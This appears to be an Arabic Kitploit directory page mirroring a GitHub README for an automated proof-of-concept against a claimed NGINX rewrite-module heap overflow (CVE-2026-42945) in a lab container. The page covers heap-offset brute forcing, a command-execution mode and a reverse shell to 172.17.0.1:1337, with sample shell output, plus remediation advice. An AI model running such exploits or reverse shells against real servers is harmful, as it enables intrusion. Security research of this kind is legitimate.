Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42945_NginxRift — يؤتمت استغلال CVE-2026-42945 في حاويات NGINX: يتحقق من الأهداف المعرّضة للخطر، ويجرب إزاحات الكومة بالقوة الغاشمة، وينفّذ الأوامر، ويفتح شلًا عكسيًا تفاعليًا. | Kitploit
أدوات/GitHubGitHub/kentox493/cve-2026-42945_nginxrift
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
kentox493/cve-2026-42945_nginxrift

CVE-2026-42945_NginxRift

يؤتمت استغلال CVE-2026-42945 في حاويات NGINX: يتحقق من الأهداف المعرّضة للخطر، ويجرب إزاحات الكومة بالقوة الغاشمة، وينفّذ الأوامر، ويفتح شلًا عكسيًا تفاعليًا.

عرض المستودع
19منذ 26 أياملم تتم المراجعة بعد

🚀 NGINX Rift PoC Automation — CVE-2026-42945

مشغّل أتمتة PoC لاستغلال RCE في حاوية nginx-rift · التحقق من الهدف ← استغلال بأمر واحد ← شل عكسي تفاعلي

Shell Python Platform License

أمر واحد ينسّق مسار الاستغلال بالكامل — بدءًا من فحص الحاوية وحتى الوصول إلى شل.


⚠️ تحذير أخلاقي وقانوني هذه الأداة مخصصة فقط لاختبارات الأمان المشروعة والمصرّح بها — اختبارات الاختراق التعاقدية، أو بيئات المختبر/CTF، أو الأصول الخاصة. الاستخدام دون إذن مالك النظام يُعد جريمة جنائية (قانون ITE، وقانون الاحتيال وإساءة استخدام الحاسوب، إلخ). المستخدم يتحمل المسؤولية الكاملة عن استخدامه.


📖 ملخص الثغرة

CVE-2026-42945 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في تكوين NGINX "Rift" — خطأ تجاوز سعة المخزن المؤقت في الكومة (heap-based buffer overflow) في الوحدة ngx_http_rewrite_module يتم استثارته عبر كتلة موقع معيّنة (/api/users/...). ونتيجة لذلك يمكن للمهاجم تنفيذ أوامر عبر معالج system() داخل الحاوية.

يحتوي هذا المستودع على مكوّنين:

الملفالوظيفة
poc.pyمحرّك الاستغلال — تخمين إزاحة الكومة، وضعان: --cmd (أمر واحد) و --shell (شل عكسي)
scan.shمنسّق الأتمتة — التحقق من الهدف، تشغيل PoC، التحقق من النتائج، وجلسة شل تفاعلية

🏗 سير العمل

root@kitploit:~
┌─────────────────────────────┐
│         scan.sh             │
│  Mode: auto / cmd / shell   │
└─────────────┬───────────────┘
              ▼
      [0] Preflight
      cek docker, curl, python3,
      nc, timeout + poc.py ada
              ▼
      [1] Verifikasi Target
      docker ps (label compose)
      → curl /api/users/42 (HTTP 200)
              ▼
      [2] PoC --cmd (max 3× retry)
      python3 poc.py --cmd 'echo hello
      from depthfirst > /tmp/pwned'
              │
              ▼ (timeout 300s per attempt)
      Verifikasi ground-truth:
      docker exec cat /tmp/pwned
              ▼
      [3] PoC --shell (opsional)
      listener 172.17.0.1:1337
      → prompt /bin/sh interaktif

⚙️ متطلبات النظام

المشغّل (المضيف الذي يتم تنفيذ السكربت عليه):

  • Linux (bash) — تم اختباره على Kali / Ubuntu / Debian
  • docker (مع sudo أو مستخدم في مجموعة docker)
  • python3 + poc.py (في نفس الدليل الذي يوجد به scan.sh)
  • curl، وnc (netcat)، وtimeout (coreutils)

الهدف (المختبر):

  • حاوية nginx-rift تعمل (تم تجهيزها عبر docker compose)
  • منفذ المضيف 19321 مفتوح على 127.0.0.1
  • الحاوية متصلة بجسر Docker (الافتراضي 172.17.0.1 لمستمع المضيف)

📥 التثبيت

root@kitploit:~
# 1. Clone
git clone https://github.com/Kentox493/CVE-2026-42945_NginxRift.git
cd CVE-2026-42945_NginxRift

# 2. Pastikan executable
chmod +x scan.sh

# 3. (Opsional) Verifikasi dependensi
command -v docker python3 curl nc timeout

يجب أن يكون scan.sh و poc.py في نفس الدليل.


🚀 طريقة الاستخدام

root@kitploit:~
./scan.sh          # alur lengkap (default: auto)
./scan.sh cmd      # hanya PoC single-command + verifikasi marker
./scan.sh shell    # langsung reverse-shell interaktif
./scan.sh help     # tampilkan bantuan

الوضع auto (الافتراضي)

  1. Preflight — التحقق من جميع التبعيات.
  2. التحقق من الهدف — هل الحاوية تعمل؟ HTTP 200؟
  3. PoC --cmd — كتابة العلامة hello from depthfirst إلى /tmp/pwned داخل الحاوية (إعادة محاولة تلقائية بحد أقصى 3 مرات، مهلة 300 ثانية لكل محاولة).
  4. التحقق من النتائج — يجب أن يحتوي docker exec cat /tmp/pwned على العلامة (ground-truth، وليس مجرد قراءة المخرجات).
  5. موجه المتابعة إلى شل عكسي؟ → y لجلسة تفاعلية.

الوضع shell

root@kitploit:~
./scan.sh shell

يتم تشغيل poc.py --shell مع مستمع على 172.17.0.1:1337. بعد نجاح التخمين، ستحصل على موجه /bin/sh تفاعلي بصلاحية مستخدم worker الخاص بـ NGINX داخل الحاوية.

ملاحظة: العنوان 172.17.0.1 هو عنوان المضيف على جسر Docker الافتراضي. إذا كان الجسر لديك مختلفًا (docker network inspect bridge)، فغيّر المتغير LISTEN_IP في أعلى scan.sh.


🔧 الإعدادات القابلة للتعديل

جميع المعاملات مجمّعة في كتلة الإعدادات أعلى scan.sh:


📸 مثال على المخرجات

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  NGINX RIFT · CVE-2026-42945 · PoC Automation Driver  │
└──────────────────────────────────────────────────────────────┘

── 0 ── Preflight
[+] Semua dependensi tersedia (docker, curl, python3, nc, timeout, poc.py)

── 1 ── Verifikasi Container & Target
[+] Container 'nginx-rift-nginx-1' berjalan
[+] Target responsif (HTTP 200): http://127.0.0.1:19321/api/users/42

── 2 ── PoC Single-Command (--cmd)
[i] Payload : echo hello from depthfirst > /tmp/pwned
[i] Target  : 127.0.0.1:19321
[!] Percobaan 1/3 — brute-force loop berjalan (timeout 300s)...

[*] trying offset 0x8a0
[*] crashed - system("...") executed
[i] Percobaan 1 selesai dalam 42 detik (rc=0)
[+] Exploit BERHASIL — marker terverifikasi: 'hello from depthfirst' (milik root)

[?] Lanjut ke reverse-shell interaktif? [y/N]: y

── 3 ── PoC Reverse-Shell (--shell)
[i] Reverse shell akan terhubung ke 172.17.0.1:1337
[i] poc.py membuka listener netcat lokal lalu menjalankan brute-force

[+] Connection from 172.18.0.2:49312
/bin/sh: 0# id
uid=1000(nginx) gid=1000(nginx) groups=1000(nginx)

🛠 استكشاف الأخطاء وإصلاحها


🛡 المعالجة (للفريق الأزرق)

  1. ترقية NGINX — قم بالترقية إلى إصدار يعمل على إصلاح ngx_http_rewrite_module / أو أزل تكوين Rift.
  2. قلّل التعرض — لا تعرض منفذ الحاوية إلى 0.0.0.0؛ استخدم شبكة داخلية + بروكسي عكسي مع WAF.
  3. أقل صلاحيات — شغّل worker الخاص بـ NGINX بدون صلاحيات إضافية؛ ولا تشغّل الحاوية بخيار --privileged.
  4. المراقبة — نبّه عند وجود طلبات غريبة إلى /api/users/ (أنماط غير رقمية، حمولات طويلة)، وكشف تشغيل /bin/sh من عملية nginx.
  5. تقسيم الشبكة — افصل جسر الحاوية عن المضيف؛ وقيّد الاتصال الصادر من الحاوية لتعقيد الشل العكسي.

📁 هيكل المستودع

root@kitploit:~
CVE-2026-42945_NginxRift/
├── scan.sh     # Automation orchestrator (bash) — verifikasi, PoC, verifikasi marker, shell
├── poc.py      # Exploit driver (python) — brute-force heap offset, mode --cmd / --shell
└── README.md   # Dokumentasi ini

⚖️ إخلاء المسؤولية والترخيص

للاستخدام القانوني فقط. هذه الأداة مخصصة لـ:

  • اختبار الاختراق الاحترافي (بعقد مكتوب)
  • البحث الأمني والإفصاح المسؤول
  • بيئات المختبر / CTF

يجب أن تحصل على إذن كتابي من مالك النظام قبل تشغيل هذه الأداة على أي بنية تحتية.

المستودع مُقدَّم "كما هو" دون أي ضمان. المساهمون غير مسؤولين عن أي إساءة استخدام.

الترخيص: MIT


📚 المراجع

  • CVE-2026-42945 — NVD / MITRE
  • NGINX ngx_http_rewrite_module — التوثيق الرسمي
  • Docker Compose — التوثيق
تنزيل الأداة
العنصرالتفاصيل
CVECVE-2026-42945
النوعRemote Code Execution (RCE)
المكوّنNGINX (ngx_http_rewrite_module) — تكوين "Rift"
المحفّزطلب إلى كتلة الموقع المعرضة للثغرة (/api/users/{id})
الأثرتنفيذ أوامر عشوائية بصلاحية مستخدم worker الخاص بـ NGINX داخل الحاوية
إعداد المختبرحاوية nginx-rift-nginx-1 — منفذ المضيف 19321
المتغيرالافتراضيالوظيفة
DOCKERsudo dockerاستبدل docker إذا كان المستخدم في مجموعة docker
PROJECT_LABELcom.docker.compose.project=nginx-riftعامل تصفية لتحديد الحاوية
CONTAINERnginx-rift-nginx-1اسم الحاوية المستهدفة
TARGET_HOST / TARGET_PORT127.0.0.1 / 19321عنوان الهدف
LISTEN_IP / LISTEN_PORT172.17.0.1 / 1337مستمع الشل العكسي
MARKER_FILE / MARKER_EXPECT/tmp/pwned / hello from depthfirstالتحقق من التنفيذ
CMD_TIMEOUT300المهلة الزمنية لكل محاولة (ثانية)
MAX_ATTEMPTS3عدد مرات إعادة محاولة PoC --cmd
المشكلةالحل
الحاوية ... لا تعملcd <project-dir> && sudo docker compose up -d، ثم أعد المحاولة
HTTP 000 / connection refusedالمنفذ 19321 غير جاهز — انتظر بضع ثوانٍ، وتحقق من docker ps
الملف 'poc.py' غير موجودشغّل scan.sh من دليل المستودع (يجب أن يكون poc.py في نفس الدليل)
PoC --cmd يفشل باستمرار (3×)ارفع MAX_ATTEMPTS / CMD_TIMEOUT؛ تأكد من أن النواة وإصدار NGINX متوافقان مع المختبر
الشل العكسي لا يتصلتحقق من أن LISTEN_IP يطابق الجسر (docker network inspect bridge)؛ وتأكد من أن المنفذ 1337 غير مستخدم
خطأ unrecognized argumentsتأكد من أن إصدار poc.py يدعم العلامات --listen-ip/--listen-port (انظر python3 poc.py -h)